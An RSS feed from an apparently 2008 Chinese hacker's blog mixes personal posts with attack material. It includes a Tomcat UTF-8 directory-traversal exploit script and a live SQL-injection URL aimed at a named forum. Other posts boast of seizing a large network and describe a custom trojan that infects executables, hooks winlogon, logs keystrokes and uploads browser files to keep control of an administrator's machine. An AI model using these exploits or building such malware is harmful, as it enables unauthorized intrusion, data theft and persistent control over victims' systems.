<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title><![CDATA[凋凌玫瑰's blog]]></title>
<link>http://www.mghacker.com/</link>
<description><![CDATA[心有多大,舞台就有多大!]]></description>
<language>zh-cn</language>
<copyright><![CDATA[Copyright 2005 PBlog2 v2.4]]></copyright>
<webMaster><![CDATA[tandailin@163.com(凋凌玫瑰)]]></webMaster>
<generator>PBlog2 v2.4</generator> 
<image>
	<title>凋凌玫瑰&#39;s blog</title> 
	<url>http://www.mghacker.com/images/logos.gif</url> 
	<link>http://www.mghacker.com/</link> 
	<description>凋凌玫瑰&#39;s blog</description> 
</image>

			<item>
			<link>http://www.mghacker.com/default.asp?id=68</link>
			<title><![CDATA[刘翔退赛了]]></title>
			<author>tandailin@163.com(凋凌玫瑰)</author>
			<category><![CDATA[个人随笔]]></category>
			<pubDate>Mon,18 Aug 2008 13:17:38 +0800</pubDate>
			<guid>http://www.mghacker.com/default.asp?id=68</guid>	
		<description><![CDATA[在QQ消息上看到了刘翔退赛的消息,又在电视上看到了冬日娜一翻声色泪下的称赞刘翔,心里不由得恨恨地骂了一句:&#34;tmd,一个充满慌言,虚伪的世界!&#34;,电视中还放起哀乐了,听得浑身上下都起疙瘩.当从上到下,官方,媒体,社会文化,都充满慌言和虚假的时候,真难想像这种沿续将是一个什么样的社会.]]></description>
		</item>
		
			<item>
			<link>http://www.mghacker.com/default.asp?id=67</link>
			<title><![CDATA[aspx 操作mysql]]></title>
			<author>tandailin@163.com(凋凌玫瑰)</author>
			<category><![CDATA[技术文章]]></category>
			<pubDate>Thu,14 Aug 2008 19:09:42 +0800</pubDate>
			<guid>http://www.mghacker.com/default.asp?id=67</guid>	
		<description><![CDATA[今天遇到一个iis只支持aspx的,禁用了asp,服务器装了mysql&nbsp;odbc驱动,想在那个iis上操作另一个服务器的mysql,可没现成的aspx操作mysql的程序,找了一下午,在msdn上找到个.net的sqldatasource类可以操作.<br/>测试成功了,留在这里备忘一下.<br/><div class="UBBPanel"><div class="UBBTitle"><img src="http://www.mghacker.com/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent"><br/>&lt;%@&nbsp;Page&nbsp;Language=&#34;VB&#34;&nbsp;%&gt;<br/>&lt;!DOCTYPE&nbsp;html&nbsp;PUBLIC&nbsp;&#34;-//W3C//DTD&nbsp;XHTML&nbsp;1.1//EN&#34;<br/>&#34;<a href="http://www.w3.org/TR/xhtmlll/DTD/xhtmlll.dtd" target="_blank">http://www.w3.org/TR/xhtmlll/DTD/xhtmlll.dtd</a>&#34;&gt;<br/>&lt;script&nbsp;runat=&#34;server&#34;&gt;<br/>&lt;/script&gt;<br/>&lt;html&nbsp;xmlns=&#34;<a href="http://www.w3.org/1999/xhtml" target="_blank">http://www.w3.org/1999/xhtml</a>&#34;&nbsp;&gt;<br/>&lt;head&nbsp;runat=&#34;server&#34;&gt;<br/>&lt;title&gt;asp.net&nbsp;to&nbsp;mysql&lt;/title&gt;<br/>&lt;/head&gt;<br/>&lt;body&gt;<br/>asp.net&nbsp;connect&nbsp;mysql<br/>&lt;form&nbsp;id=&#34;forml&#34;&nbsp;runat=&#34;server&#34;&gt;<br/>&lt;div&gt;<br/>&lt;asp:GridView&nbsp;ID=&#34;GridViewl&#34;&nbsp;Runat=&#34;server&#34;<br/>DataSourceID=&#34;SqlDataSourcel&#34;&gt;<br/>&lt;/asp:GridView&gt;<br/>&lt;asp:SqlDataSource&nbsp;ID=&#34;SqlDataSourcel&#34;&nbsp;Runat=&#34;server&#34;<br/>ProviderName=&#34;System.Data.Odbc&#34;<br/>ConnectionString=&nbsp;&#34;DRIVER={MySQL&nbsp;ODBC&nbsp;3.51&nbsp;Driver};SERVER=localhost;DATABASE=test;UID=test;PASSWORD=testtest;&#34;<br/>Sel&#101;ctCommand=&#34;Sel&#101;ct&nbsp;*&nbsp;from&nbsp;dede_admin&#34;<br/>&gt;&nbsp;<br/>&lt;/asp:SqlDataSource&gt;<br/>&lt;/div&gt;<br/>&lt;/form&gt;<br/>&lt;/body&gt;<br/>&lt;/html<br/></div></div>]]></description>
		</item>
		
			<item>
			<link>http://www.mghacker.com/default.asp?id=66</link>
			<title><![CDATA[Apache Tomcat UTF-8编码漏洞]]></title>
			<author>tandailin@163.com(凋凌玫瑰)</author>
			<category><![CDATA[技术文章]]></category>
			<pubDate>Wed,13 Aug 2008 11:59:32 +0800</pubDate>
			<guid>http://www.mghacker.com/default.asp?id=66</guid>	
		<description><![CDATA[这个漏洞类似当年的iis&nbsp;url&nbsp;编码漏洞<br/>漏洞发生在Apache&nbsp;Tomcat处理UTF-8编码时，没有正确转换，从而导致在处理包含%c0%ae%c0%ae的url时转换为类似../的形式，使得可以遍历系统任意文件，包括<br/><br/>/etc/passwd等<br/><br/>触发的条件为Apache&nbsp;Tomcat的配置文件context.xml&nbsp;或&nbsp;server.xml&nbsp;的&#39;allowLinking&#39;&nbsp;和&nbsp;&#39;URIencoding&#39;&nbsp;允许&#39;UTF-8&#39;选项<br/><br/>漏洞测试代码如下：<br/><div class="UBBPanel"><div class="UBBTitle"><img src="http://www.mghacker.com/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent"><br/>Dim&nbsp;strUrl,strSite<br/><br/>showB()<br/>Set&nbsp;Args&nbsp;=&nbsp;Wscript.Arguments<br/><br/>If&nbsp;Args.Count&nbsp;&lt;&gt;&nbsp;1&nbsp;Then<br/>ShowU()<br/>Else<br/>strSite=Args(0)<br/>End&nbsp;If<br/><br/>&nbsp;strUrl=&#34;/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar&#34;<br/><br/>&nbsp;Set&nbsp;objXML&nbsp;=&nbsp;Cr&#101;ateObject(&#34;Microsoft.XMLHTTP&#34;)<br/>&nbsp;objXML.Open&nbsp;&#34;GET&#34;,strSite&nbsp;&amp;&nbsp;strUrl,&nbsp;False<br/>&nbsp;objXML.SetRequestHeader&nbsp;&#34;Referer&#34;,&nbsp;strSite&nbsp;<br/><br/>&nbsp;objXML.send()<br/><br/>if&nbsp;objXML.status=200&nbsp;then<br/>&nbsp;wscript.echo(&#34;存在漏洞&#34;)<br/><br/>end&nbsp;if<br/><br/>&nbsp;<br/><br/>Sub&nbsp;showB()<br/>With&nbsp;Wscript<br/>&nbsp;.Echo(&#34;+--------------------------=====================------------------------------+&#34;)<br/>&nbsp;.Echo(&#34;Exploit&nbsp;Apache&nbsp;Tomcat&nbsp;UTF-8&#34;)<br/>&nbsp;.Echo(&#34;Code&nbsp;By&nbsp;Safe3&#34;)<br/>&nbsp;.Echo(&#34;+--------------------------=====================------------------------------+&#34;)<br/>End&nbsp;with<br/>End&nbsp;Sub<br/>Sub&nbsp;showU()<br/>With&nbsp;Wscript<br/>&nbsp;.Echo(&#34;+--------------------------=====================------------------------------+&#34;)<br/>&nbsp;.Echo(&#34;用法:&#34;)<br/>&nbsp;.Echo(&#34;&nbsp;cscript&nbsp;&#34;&amp;.ScriptName&amp;&#34;&nbsp;site&#34;)<br/>&nbsp;.Echo(&#34;例子:&#34;)<br/>&nbsp;.Echo(&#34;&nbsp;cscript&nbsp;&#34;&amp;.ScriptName&amp;&#34;&nbsp;<a href="http://www.example.com" target="_blank">http://www.example.com</a>&nbsp;&gt;result.txt&#34;)<br/>&nbsp;.Echo(&#34;+--------------------------=====================------------------------------+&#34;)<br/>&nbsp;.Quit<br/>End&nbsp;with<br/>End&nbsp;Sub<br/></div></div>]]></description>
		</item>
		
			<item>
			<link>http://www.mghacker.com/default.asp?id=65</link>
			<title><![CDATA[奥运开幕式]]></title>
			<author>tandailin@163.com(凋凌玫瑰)</author>
			<category><![CDATA[个人随笔]]></category>
			<pubDate>Sat,09 Aug 2008 09:58:07 +0800</pubDate>
			<guid>http://www.mghacker.com/default.asp?id=65</guid>	
		<description><![CDATA[只看到了中国的历史。。。。。]]></description>
		</item>
		
			<item>
			<link>http://www.mghacker.com/default.asp?id=64</link>
			<title><![CDATA[DISCUZ字符转码漏洞]]></title>
			<author>tandailin@163.com(凋凌玫瑰)</author>
			<category><![CDATA[技术文章]]></category>
			<pubDate>Thu,07 Aug 2008 20:11:43 +0800</pubDate>
			<guid>http://www.mghacker.com/default.asp?id=64</guid>	
		<description><![CDATA[最近出来的php第三方编码转换类漏洞又要死一大批php站了。<br/>先是phpwind接着又是discuz论坛<br/>编码转换没处理的都会存在这类漏洞了<br/>phpwind的大家都知道了，今天群里还有人不知道discuz的。<br/>顺便在群里看到个discuz论坛的站，发出来就都知道咋注了。<br/><a href="http://bbs.hefei.cc/space.php?username=%cf" target="_blank">http://bbs.hefei.cc/space.php?username=%cf</a>&#39;%20UNION%20Sel&#101;ct%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,database(),83/*<br/>我个人还是比较反对四处黑站的。]]></description>
		</item>
		
			<item>
			<link>http://www.mghacker.com/default.asp?id=63</link>
			<title><![CDATA[纪念一下]]></title>
			<author>tandailin@163.com(凋凌玫瑰)</author>
			<category><![CDATA[个人随笔]]></category>
			<pubDate>Thu,07 Aug 2008 15:37:16 +0800</pubDate>
			<guid>http://www.mghacker.com/default.asp?id=63</guid>	
		<description><![CDATA[今天取得了目前遇到的最大网络的最高权限，在此过程中又提升了一些经验，当取得了超越管理员的权限时，也就超越了自己，有一种说不出的高兴。]]></description>
		</item>
		
			<item>
			<link>http://www.mghacker.com/default.asp?id=62</link>
			<title><![CDATA[遭遇RSA securid动态加密]]></title>
			<author>tandailin@163.com(凋凌玫瑰)</author>
			<category><![CDATA[技术文章]]></category>
			<pubDate>Wed,06 Aug 2008 15:44:55 +0800</pubDate>
			<guid>http://www.mghacker.com/default.asp?id=62</guid>	
		<description><![CDATA[&nbsp;终于遇到传说中的RSA&nbsp;securid动态加密了，加密的3389，在登录的时候是随机产生密码的，汗。。。。<br/>对方将所有的管理员登录敏感数据的操作都放在只对rsa加密的终端服务器跳板之后。<br/>控制了管理员机器，但管理员的操作都是3389登录到rsa加密的跳板机上的，动态密码每一分钟变一次，记录也没用，很强的，思索中。。。。。<br/>在网上找了一个这个第三方加密软件的资料，很强。<br/>securID动态令牌可以用于任何一种支持动态口令认证的系统。不光是登录VPN的时候用。<br/>需要一台认证服务器，可以装cisco的ACS&nbsp;server搭建radius认证服务器，然后安装RSA&nbsp;securid的管理客户端，也就是插件到这台ACS服务器上，然后把需要才用动态口令认证的用户或用户组选择认证方式为RSA&nbsp;securid，其他的ACS服务器设置没啥特别的，认证服务器这头的设计就基本完成了。<br/>然后需要另外一台服务器安装RSA&nbsp;securid的管理软件，这台服务器需要和ACS&nbsp;server有良好的通讯，需要设置安全认证互访。这台RSA管理服务器的作用主要是对一块块小的电子令牌做初始化同步的时候使用的。<br/>令牌和认证服务器和管理服务器完全没有物理联系，令牌中的数字每分钟的变化其实是个伪随机算法，根据每个令牌背后的序列号作为运算的一个参数进行每分钟的跳动的。初始化的时候，需要拿着令牌设置管理服务器上的管理软件，需要输入令牌的序列号，然后输入令牌上显示的6位数字，过一分钟再输入一次，这样服务器就完成了和令牌的“时间”同步。也就是服务器知道了这个号码的令牌每一分钟变化的规律了。加上4位PIN是为了降低令牌本身被偷盗后造成的风险。<br/><br/>至于认证的时候，用户登录启用动态认证的系统，会要求输入个人的4位PIN码加上令牌当前显示的6位数字。然后应用系统会根据系统的设置才用LDAP或者RADIUS等方式去询问ACS认证服务器进行授权，那ACS服务器看到这个请求，自然根据ACS中的设置再去询问RSA管理服务器是否正确，全都OK就认证通过。<br/><br/>由于时间不可能完全对准，所以，基本上认证的时候前后差1分钟显示的3个数字都会被接受。<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.mghacker.com/default.asp?id=61</link>
			<title><![CDATA[我国部分城市明日将现日全食(时间表)]]></title>
			<author>tandailin@163.com(凋凌玫瑰)</author>
			<category><![CDATA[个人随笔]]></category>
			<pubDate>Thu,31 Jul 2008 17:11:35 +0800</pubDate>
			<guid>http://www.mghacker.com/default.asp?id=61</guid>	
		<description><![CDATA[新华网南京7月31日电（记者蔡玉高、周润健）为方便公众观赏此次日食，中科院紫金山天文台副研究员曹云经过测算，得出了我国主要城市可见日食的时间。<br/><br/><img src="http://www.mghacker.com/attachments/month_0807/w2008731171113.jpg" border="0" alt=""/><br/>8月1日，我国将迎来本世纪第一次日全食<br/><br/>&nbsp;<br/><br/>曹云介绍，日全食的发生主要包括这样几个时间节点：初亏，月球靠近太阳之时，月球的视圆面第一次和太阳视圆面相外切的时刻，即日食开始；食甚，月球中心和太阳中心距离最近的时刻，此时，看到太阳被遮掩的部分最大。日全食时，食甚即为太阳被完全遮住之时；复圆，月球的视圆面第二次和太阳视圆面相外切的时刻，即该地方见食结束。&nbsp;<br/><br/>&nbsp;<br/><br/>以下是我国主要城市可见日食的时间表，其中时间为北京时间，“——”则代表该城市无法见到日全食发生的那个特定的时间点。曹云表示，无法看到食甚的公众将能看到带食日落的美妙场景，而能够看到食甚的公众则相对较为幸运，他们可看到太阳被月亮完全遮住时的情景。当然，最幸运的要数能够看到复圆的公众，因为他们能够看到整个日全食的发生过程。&nbsp;<br/><br/>&nbsp;<br/><br/>地名&nbsp;初亏食&nbsp;甚复圆&nbsp;<br/><br/>北京&nbsp;18时17分13秒&nbsp;19时10分02秒————&nbsp;<br/><br/>&nbsp;<br/><br/>天津&nbsp;18时18分18秒&nbsp;19时10分48秒————&nbsp;<br/><br/>&nbsp;<br/><br/>石家庄&nbsp;18时20分21秒&nbsp;19时13分27秒————&nbsp;<br/><br/>&nbsp;<br/><br/>太原&nbsp;18时20分49秒&nbsp;19时14分26秒————&nbsp;<br/><br/>&nbsp;<br/><br/>呼和浩特18时16分15秒&nbsp;19时10分26秒————&nbsp;<br/><br/>&nbsp;<br/><br/>沈阳&nbsp;18时13分12秒&nbsp;19时04分24秒————&nbsp;<br/><br/>&nbsp;<br/><br/>长春&nbsp;18时09分42秒&nbsp;19时00分36秒————&nbsp;<br/><br/>&nbsp;<br/><br/>哈尔滨18时06分40秒&nbsp;18时57分25秒————&nbsp;<br/><br/>&nbsp;<br/><br/>上海&nbsp;18时28分27秒&nbsp;————————&nbsp;<br/><br/>&nbsp;<br/><br/>南京&nbsp;18时28分12秒&nbsp;————————&nbsp;<br/><br/>&nbsp;<br/><br/>杭州&nbsp;18时30分11秒&nbsp;————————&nbsp;<br/><br/>&nbsp;<br/><br/>合肥&nbsp;18时28分54秒————————&nbsp;<br/><br/>&nbsp;<br/><br/>福州&nbsp;18时36分17秒&nbsp;————————&nbsp;<br/><br/>&nbsp;<br/><br/>南昌&nbsp;18时33分48秒&nbsp;————————&nbsp;<br/><br/>&nbsp;<br/><br/>济南&nbsp;18时22分02秒&nbsp;19时14分19秒————&nbsp;<br/><br/>&nbsp;<br/><br/>郑州&nbsp;18时25分27秒&nbsp;19时18分21秒————&nbsp;<br/><br/>&nbsp;<br/><br/>武汉&nbsp;18时31分30秒&nbsp;————————&nbsp;<br/><br/>&nbsp;<br/><br/>长沙&nbsp;18时35分19秒&nbsp;————————&nbsp;<br/><br/>&nbsp;<br/><br/>广州&nbsp;18时42分36秒&nbsp;————————&nbsp;<br/><br/>&nbsp;<br/><br/>南宁&nbsp;18时44分39秒&nbsp;————————&nbsp;<br/><br/>&nbsp;<br/><br/>成都&nbsp;18时32分57秒&nbsp;19时27分34秒————&nbsp;<br/><br/>&nbsp;<br/><br/>贵阳&nbsp;18时39分10秒&nbsp;19时32分01秒————&nbsp;<br/><br/>&nbsp;<br/><br/>昆明&nbsp;18时42分18秒&nbsp;19时35分32秒————&nbsp;<br/><br/>&nbsp;<br/><br/>拉萨&nbsp;18时34分09秒&nbsp;19时31分42秒&nbsp;20时24分44秒&nbsp;<br/><br/>&nbsp;<br/><br/>西安&nbsp;18时26分46秒&nbsp;19时20分50秒————&nbsp;<br/><br/>&nbsp;<br/><br/>兰州&nbsp;18时24分01秒&nbsp;19时19分49秒————&nbsp;<br/><br/>&nbsp;<br/><br/>西宁&nbsp;18时22分53秒&nbsp;19时19分24秒&nbsp;20时12分00秒&nbsp;<br/><br/>&nbsp;<br/><br/>银川&nbsp;18时20分03秒&nbsp;19时15分31秒————&nbsp;<br/><br/>&nbsp;<br/><br/>乌鲁木齐18时05分34秒&nbsp;19时07分34秒&nbsp;20时04分59秒&nbsp;<br/><br/>&nbsp;<br/><br/>台北&nbsp;18时36分39秒&nbsp;————————&nbsp;<br/><br/>&nbsp;<br/><br/>香港&nbsp;18时43分30秒&nbsp;————————&nbsp;<br/><br/>&nbsp;<br/><br/>海口&nbsp;18时48分14秒&nbsp;————————&nbsp;<br/><br/>&nbsp;<br/><br/>澳门&nbsp;18时43分51秒&nbsp;————————&nbsp;<br/><br/>&nbsp;<br/><br/>重庆&nbsp;18时34分26秒&nbsp;19时28分11秒————&nbsp;<br/><br/>&nbsp;<br/><br/>漠河&nbsp;17时55分10秒&nbsp;18时47分33秒&nbsp;19时37分33秒&nbsp;<br/><br/>&nbsp;<br/><br/>喀什&nbsp;18时08分12秒&nbsp;19时12分31秒&nbsp;20时11分31秒&nbsp;<br/><br/>&nbsp;<br/><br/>抚远&nbsp;18时01分02秒<br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.mghacker.com/default.asp?id=60</link>
			<title><![CDATA[PJblog 密码修改]]></title>
			<author>tandailin@163.com(凋凌玫瑰)</author>
			<category><![CDATA[个人随笔]]></category>
			<pubDate>Thu,31 Jul 2008 17:01:58 +0800</pubDate>
			<guid>http://www.mghacker.com/default.asp?id=60</guid>	
		<description><![CDATA[今天又忘了blog&nbsp;的密码了，想去数据库修改，看它加密方式又不是md5,只好写段asp来修改了，放在这儿下次忘了密码备用。<br/><div class="UBBPanel"><div class="UBBTitle"><img src="http://www.mghacker.com/images/code.gif" style="margin:0px 2px -3px 0px" alt="程序代码"/> 程序代码</div><div class="UBBContent"><br/><br/>&lt;!--#include&nbsp;file=&#34;common/sha1.asp&#34;&nbsp;--&gt;<br/>&lt;%<br/>dim&nbsp;rs,my_Name<br/>my_Name=&#34;need&nbsp;find&nbsp;user&#34;<br/>set&nbsp;conn=Server.Cr&#101;ateObject(&#34;ADODB.Connection&#34;)　<br/>DBPath&nbsp;=&nbsp;Server.MapPath(&#34;xxxx.mdb&#34;)<br/>conn.Open&nbsp;&#34;provider=microsoft.jet.oledb.4.0;data&nbsp;source=&#34;&amp;dbpath<br/>Set&nbsp;rs&nbsp;=&nbsp;Server.Cr&#101;ateObject(&#34;ADODB.Recordset&#34;)　<br/>rs.open&nbsp;&#34;sel&#101;ct&nbsp;mem_ID,mem_Name,mem_Password,mem_salt&nbsp;from&nbsp;blog_Member&nbsp;wh&#101;re&nbsp;mem_email=&#39;my_name&#39;&#34;,conn,1,3<br/>&nbsp;&nbsp;dim&nbsp;NewPass,Uname,NewPass2<br/>&nbsp;&nbsp;Uname=rs(&#34;mem_Name&#34;)<br/>&nbsp;&nbsp;randomize<br/>&nbsp;&nbsp;NewPass=Int(8999*Rnd()&nbsp;+1000)<br/>&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;len(NewPass)&gt;0&nbsp;then<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;dim&nbsp;strSalt<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;strSalt=rs(&#34;mem_salt&#34;)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;NewPass2=SHA1(NewPass&amp;strSalt)<br/>&#160;&#160;&#160;&#160;&nbsp;&nbsp;Conn.Execute(&#34;up&#100;ate&nbsp;blog_member&nbsp;set&nbsp;mem_Password=&#39;&#34;&amp;NewPass2&amp;&#34;&#39;,mem_salt=&#39;&#34;&amp;strSalt&amp;&#34;&#39;&nbsp;wh&#101;re&nbsp;mem_name=&#39;&#34;&amp;my_name&amp;&#34;&#39;)<br/>&#160;&#160;&#160;&#160;&nbsp;&nbsp;end&nbsp;if<br/>&nbsp;&nbsp;rs.close<br/>&nbsp;&nbsp;set&nbsp;rs=nothing&nbsp;&nbsp;<br/>&nbsp;&nbsp;response.write&nbsp;&#34;&lt;script&nbsp;language=javascript&gt;&nbsp;alert(&#39;user&nbsp;&#34;&amp;Uname&amp;&#34;&nbsp;change&nbsp;password:&#34;&amp;NewPass&amp;&#34;\n\n&#39;);location.replace<br/>(&#39;default.asp&#39;);&lt;/script&gt;&#34;<br/>&nbsp;&nbsp;response.End()<br/>%&gt;<br/><br/></div></div>]]></description>
		</item>
		
			<item>
			<link>http://www.mghacker.com/default.asp?id=59</link>
			<title><![CDATA[如何留住重要机器]]></title>
			<author>tandailin@163.com(凋凌玫瑰)</author>
			<category><![CDATA[技术文章]]></category>
			<pubDate>Tue,15 Jul 2008 13:34:37 +0800</pubDate>
			<guid>http://www.mghacker.com/default.asp?id=59</guid>	
		<description><![CDATA[前段时间历尽千辛万苦让管理员机器中了木马，可见这台机器是来得相当不易。<br/>为了控制好这台机器，我想出了一个死缠烂打的程序。<br/>首先是一个感染，当然这个感染功能是写在下载者里面的，其实感染程序和下载者是两个程序，分开来写的，然后又融合在了一起。<br/>感染采用搜寻除c盘的其它盘的exe文件，在其pe有小于四百字节的，在空字节里面写入download&nbsp;shellcode,download&nbsp;shellcode采用加密变型，主要用来下载一个下载者，下载者生成一个文件供这个感染程序来判断是否下载并执行成功，如果下载执行成功，就不再执行下载。此感染程序不改变文件大小和时间及文件图标。整个程序汇编三百多字节完成。<br/>感染程序感染的pe文件都注入一个感染的下载shellcode，先判断标识文件，没下载者生成的文件就再下载下载者。用来守护下载者。<br/>下载者是另一部分，采用汇编体积很少，下载者恢复ssdt过主动，插入winlogon进程，并hook自身dll文件。下载者从url中读取一个下载列表，每次开机判断url中txt文件的下载exe名是否有变化，有变化就重新下载。<br/>再将一个记录发送工具集成在了下载者列表中，搜索本机sm.dat&nbsp;stats.dat&nbsp;sites.dat&nbsp;quick.dat&nbsp;bookmarks.dat文件，并上传到空间。同时集成了键盘记录，并按生成的日志大小发送到空间。<br/>哈哈，大杀器让工作室刘大侠几天时间完成了。<br/>现管理员已重装了n次机器，依然上线如健，最近一次手工清了我的马，还待他重启一下机器就下载个新马进去了，哈哈。]]></description>
		</item>
		
</channel>
</rss>